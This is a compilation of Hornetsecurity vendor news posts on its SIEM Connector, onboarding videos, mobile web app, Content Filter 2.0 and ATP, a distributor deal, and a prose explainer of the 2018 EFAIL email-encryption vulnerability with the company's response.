Hornetsecurity Services compatible with SIEM services thanks to new SIEM Connector

Hornetsecurity Services compatible with SIEM services thanks to new SIEM Connector

The IT infrastructures of companies are exposed to a variety of different threats – ranging from ransomware attacks to phishing waves, or bot attacks aimed at firewalls. To avoid becoming a victim of cyber attacks, complex defense mechanisms must be installed. SIEM services are an important component of this process. SIEM services bundle and analyze all security-relevant data at a central location, which allows suspicious activities to be detected early.

With the new Hornetsecurity SIEM Connector, Hornetsecurity now also offers an interface for SIEM services for its 365 Total Protection and Spam Filter Service products. The Connector automatically receives and imports e-mail log entries from the Hornetsecurity Cloud.


Data relating to IT security can be found in many different places in an organization – on end devices, servers, network devices, and special security infrastructure such as firewalls, antivirus or mail security systems. Information and Event Management Services (SIEM) are software products that collect and analyze this information in real-time at a central location.  The programs derive patterns and trends based on this information so that targeted cyber attacks with multiple attack vectors can be detected more quickly. Among the best-known SIEM services are IBM QRadar and Splunk.

The Hornetsecurity SIEM Connector

With the new Hornetsecurity SIEM Connector, users of SIEM services can have email log entries automatically read from the Hornetsecurity Cloud. The new product can be booked if the Hornetsecurity Spam Filter Service or 365 Total Protection (Business or Enterprise) is already in use.

The Hornetsecurity SIEM Connector sends detailed information by means of syslog packets containing the following details:

• General email information: Email subject, attachment file names, message ID from the header, encryption method used and size of the email.

• Processing information: date and time of first processing, classification and reason for classification and number of log entries for this email.

• Sender information: Source address from the SMTP dialog and sender as specified in the email header.

• Information about the recipient: Mailbox to which this email has been assigned by the Hornetsecurity Spamfilter service and recipient, as specified in the e-mail header.

Thanks to the connector, Hornetsecurity services can provide critical log data to SIEM services to provide comprehensive protection for the IT infrastructure.

Simple onboarding of the Hornetsecurity Services: Video tutorial for product training

Simple onboarding of the Hornetsecurity Services: Video tutorial for product training

Extortion, theft, drug trafficking – in times of digitalization, all these crimes are also committed online. Email communication has a central role therein: it is considered the most popular means of communication in companies and at the same time the main vector of incidence for malware. Through social engineering, cybercriminals manipulate their victims in order to persuade them to click on links and open attachments containing ransomware and trojans, for example.

However, companies are not only facing the challenge of protecting email inboxes from misuse as a gateway for cyberattacks. Information and data communicated via email are also increasingly becoming a valuable digital resource in a cybercriminal environment. Managed Security Services offer comprehensive protection against increasing cybercrime without the installation of additional hardware or software. Every day, several new cyber threats emerge that seek their way into the system, so it is important to act quickly.

Hornetsecurity’s Email Security Services protect your email communications from the most sophisticated cyber attacks, annoying spam and malware. In order to offer customers, the opportunity to familiarize themselves with the services in advance and to make the implementation of the products as easy as possible, Hornetsecurity extends its onboarding service with a training program in form of YouTube videos. The activation of the services can thus be implemented as quickly and easily as possible directly by the user.

The trainings are organized in different playlists: The Spamfilter Basic Playlist provides information about the setup of Hornetsecuritys Spam & Malware Protection and its different features. The Spamfilter Advanced I Playlist contains further information on the use of 365 Total Protection, Email archiving and the Signature & Disclaimer. The Spamfilter Advanced II Playlist provides users with useful information on Email encryption and Advanced Threat Protection.

The videos can be accessed at any time using the links below and provide customers all the information they need for onboarding.

Hornetsecurity mobile – on the move with the Progressive Web App

Hornetsecurity mobile – on the move with the Progressive Web App

In recent years, the number of apps downloaded from app stores to mobile devices has steadily decreased. According to a forecast by the IT consulting firm Gartner, half of all apps used in 2020 will be Progressive Web Apps (PWA). Hornetsecurity reacted to this trend and released a Progressive Web App for the Hornetsecurity Control Panel.

A Progressive Web App is a combination of a responsive website and a native app. Since February 2019, a Progressive Web App is available to all Hornetsecurity customers, enabling them to access the control panel from a mobile device in a simple way. Since the release of the control panel version at the end of June 2019, the Progressive Web App has also been available as a white label version with which Hornetsecurity customers and partners who have booked the white label option can customize the app name, icon and splash screen.

Advantages of the Progressive Web App from Hornetsecurity

With the Progressive Web App, it is possible to create an icon on the home screen, allowing easy access to the control panel. In comparison to a responsive website, the Control Panel does not has to be opened in a browser but is accessed directly by clicking on the icon. With the white label version, the icon, app name and logo on the splash screen can also be adapted to the company’s design.

Another advantage is that, unlike native apps, the Progressive Web App does not need to be downloaded and therefore does not consume any storage capacity on the mobile device. The Progressive Web App software also updates automatically. Furthermore, the use of the Progressive Web App saves time, as the user name and password can be saved and thus prevent the time-consuming, repeated input of user data.

So, if you want to access the control panel quickly and conveniently from home or on the train, install the Progressive Web App and benefit from better usability.

How to

1. Open the Internet browser on your smartphone and enter “cp.hornetsecurity.com” in the address bar.
2. At the bottom of your browser, a pop-up opens with the instructions for installing the Web App.
3. After installing the Web App on your home screen, open the app and log in with your login data.

CONTENT FILTER 2.0 – The security officer for your data transfer

CONTENT FILTER 2.0 – The security officer for your data transfer

The State Criminal Police Office of Lower Saxony is currently warning against an increase of emails with fraudulent application content. These emails are explicitly directed at companies with advertised vacancies and endanger in particular personnel departments that are involved in application processes. The seriously formulated emails are attached with alleged application documents in the form of archive data. If these files are unpacked, however, no application documents are revealed, but rather dangerous malware that infects the system.

Secure data transfer with Hornetsecurity’s Content Filter

With Hornetsecurity’s Content Filter, effective protection measures can be taken against unwanted file attachments. In addition to the general protection provided by the spam and virus filter, individual settings for attachments of incoming and outgoing emails can be made within the content filter. Updating the content filter to version 2.0 now also checks nested archives. Defined rules can still be applied for the entire domain or for certain user groups. This allows particularly vulnerable groups in the company to be deliberately protected against current attacks.

Easy setting – secure data transfer

The Content Filter offers an uncomplicated handling for the management of email attachments. Unwanted file formats, such as executable files, are grouped under the collective term .executable and can be selected from a predefined list with just a few clicks by the first time they are set up. Additional file formats that do not fall under one of the collective terms can be added if required. In addition, it is possible to individually configure the maximum permitted size for affected email attachments.
Hornetsecuity Content Filter 2.0

Fig. 1: Settings in the content filter for incoming emails

In case of application two actions can be set for handling the affected: Block email or cut attachment. In addition, encrypted Attachments, which are increasingly used in common formats such as PDF, ZIP, RAR etc., can be explicitly prohibited (Fig. 1). Furthermore, the content filter includes an automated comparison of file extensions with the supplied MIME type, which can differ significantly from the file extension in the case of suspicious email attachments. Archive Files that have internal nesting structures in the form of additional archives are analyzed and evaluated down to the security-relevant level.
If the content filter intervenes and removes a suspicious attachment, it changes the original state of the message. For signed emails, active intervention by the content filter causes the signature to be corrupted. If this occurs, the content filter informs the recipient and specifies whether the signature was valid before the change (Fig.2).
Hornetsecurity Content Filter 2.0

Fig. 2: Valid signature after truncating the content

However, if the certificate of the signed email is available on our systems, the email whose signature was broken by truncating the file attachment is re-signed and thus retains its validity.
The content filter can be activated for all Hornetsecurity partners and customers in addition to the spam and virus filter.

ATP – the interoperable complement for comprehensive protection

The current threat landscape of malware ranges from ransomware to cryptominers and is constantly changing. Spam, virus and content filters provide a solid basis against cyber attacks. These filters do not provide 100% protection against targeted and sophisticated attacks on companies. Further protection mechanisms are needed that adapt to the constantly changing types of attacks and malware. By combining Hornetsecurity’s interoperable filters, full protection against specific cyber attacks can be achieved and sustainably secured for companies.
In addition to the spam and virus filter, Advanced Threat Protection (ATP) from Hornetsecurity offers reliable protection against current malware attacks. ATP integrates seamlessly into the existing filters from Hornetsecurity email services and has, in comparison to the content filter, profound behavior analyses of file contents. Thanks to the integrated ATP engines such as the sandbox, URL Rewriting and URL Scanning , attacks such as targeted or blended attacks are detected early and the necessary protective measures are initiated in real time. For example, hidden links infiltrated in files can be recursively tracked in an isolated environment and the content hidden within can be subjected to forensic analysis. For content patterns that indicate malicious intent, the company’s IT security team is notified in real time for immediate protection.
EFAIL: A vulnerability in the PGP and S/MIME encryption methods?

EFAIL: A vulnerability in the PGP and S/MIME encryption methods?

UPDATE from May 16, 2018:
In order to proactively protect our corporate customers, who are still encrypting and decrypting their emails via an in-house solution and have not yet booked the Hornetsecurity Encryption Service, from EFAIL, we have also developed a special filter level for attacks according to the EFAIL pattern. The only prerequisite for this is that their email communication runs via the Hornetsecurity servers, which is generally the case with our email security products.   The filter level is already activated by default for all our customers who have booked at least the Hornetsecurity spam filter service and. It protects not only against EFAIL, but also against future attacks with similar patterns.   +++++   A known vulnerability is transferred to the PGP and S/MIME protocols and takes email manipulation to a new level. No problem for Hornetsecurity.
On Monday, May 14, 2018, a team of security researchers from the University of Applied Sciences Münster, the Ruhr University Bochum and the University of Leuven (Belgium) published a paper that questions the security of the PGP and S/MIME encryption standards and thus attracts worldwide attention.
However, the vulnerabilities discovered (CVE-2017-17688 and CVE-2017-17689) do not affect the protocols themselves, but use an already known vulnerability to decrypt encrypted emails by the mail client and send them to the attacker.
A prerequisite for the execution of the attacks is that the attacker already possesses emails in encrypted form. To do this, the emails need to be intercepted during transport. The attacker must have previously executed a man-in-the-middle attack (MitM) or compromised a mail server to gain access to the emails passing through him or the server. Only if these requirements are met, the attacker can execute one of the EFAIL attacks described in the paper.
The authors of the paper present two similar attacking methods to decrypt emails with existing PGP or S/MIME encryption.
The first method is quite simple, but limited to certain email clients (Apple Mail, iOS Mail, Mozilla Thunderbird) and any third-party plug-ins installed there:
To do this, the attacker creates an email with three body parts. The first part formats the email as HTML and inserts an image tag with a target website. The quotation marks and the image tag are not closed. This is followed in the second body part by the PGP- or S/MIME-encrypted text. The third part consists of HTML formatting again and closes the image tag from part one.
EFAIL vulnerabilty pgp smime encryption methods

(Source: EFAIL attacks, 14/05/04 )

If the attacker sends this email to the sender of the encrypted message, it is possible that the message is decrypted and transmitted to the stored website. To do this, the email client must be configured so that it automatically downloads external images without asking the user.
The second way to read PGP or S/MIME encrypted emails is a well-known method of how to extract plain text in blocks of encrypted messages.
The attacking scenarios are called CBC attack (S/MIME) and CFB attack (PGP). They determine a known text portion in an encrypted message and overwrites subsequent blocks with their own content. The EFAIL attack inserts an image tag with a target website into the encrypted text, as described in the first part. If the message is then delivered to the actual recipient of the encrypted message, it is possible that the message is decrypted and transmitted to the attacker.
Hornetsecurity News

Stay in touch

Sign up to get the latest News about Cloud Security.

The emails encrypted by Hornetsecurity are protected by design against attacks of this kind, since Hornetsecurity does not even allow the different content types (multipart/mixed) required for the attack.
The encryption methods themselves – S/MIME and PGP – were not broken; rather, vulnerabilities were found in email clients for HTML emails that bypass these encryption techniques. In addition, we object to the recommendation of various security researchers to generally deactivate content encryption: PGP and S/MIME are still not per se more insecure than a pure transport-encrypted transmission or no encryption at all, even after this publication. Since the attack requires a MitM attack, i.e. a breaking of the possible transport encryption, a general levering out of content encryption would be fatal: Possible attackers could even read the email traffic directly like a postcard!
Hornetsecurity Encryption Service, which is immune to EFAIL, does not require any client plug-ins: Encryption and decryption are fully automated by Hornetsecurity in the cloud – no installation, maintenance or user interaction is required – simply secure!

Further information:

Hornetsecurity signs first U.S. distributor deal

Hornetsecurity signs first U.S. distributor deal

Value-added distributor Contronex includes Hornetsecurity’s Cloud Security Services into its portfolio   Hornetsecurity has closed its first VAD contract in the U.S. with Naples, FL based distributor Contronex.  With this new partnership, Hornetsecurity will significantly expand its reach into the U.S. and Canada.
Hornetsecurity News

Stay in touch

Sign up to get the latest News about Cloud Security.

  According to Oliver Dehning, CEO of Hornetsecurity. “With Contronex, we have found the perfect match. They are experienced in providing the best security solutions in the IT marketplace.  Also, they offer an extensive network of resellers that are trained in selling high-class security products. We’re very happy to have established a relationship with this experienced partner.”   “As a growing value-added distributor of IT security software solutions, we regularly add new vendors to expand our product portfolio. With Hornetsecurity, the onboarding process was accomplished quicker than ever”, adds Beat Kramer, CEO at Contronex.   Hornetsecurity, a leading European Cloud Security Service provider, offers a full suite of Email Security Solutions protecting companies of all sizes from malware or phishing attacks and unauthorized access and loss of data, all without the need for extra hardware, software or administrative effort.
Founded in 1990 in Naples, FL, Contronex specializes in the distribution of IT security solutions and commits to three simple concepts: integrity, reliability and commitment to service, which aligns perfectly with the Hornetsecurity approach. Contronex has developed a unique partner program for resellers and managed service providers that helps them to purchase the products their clients’ need.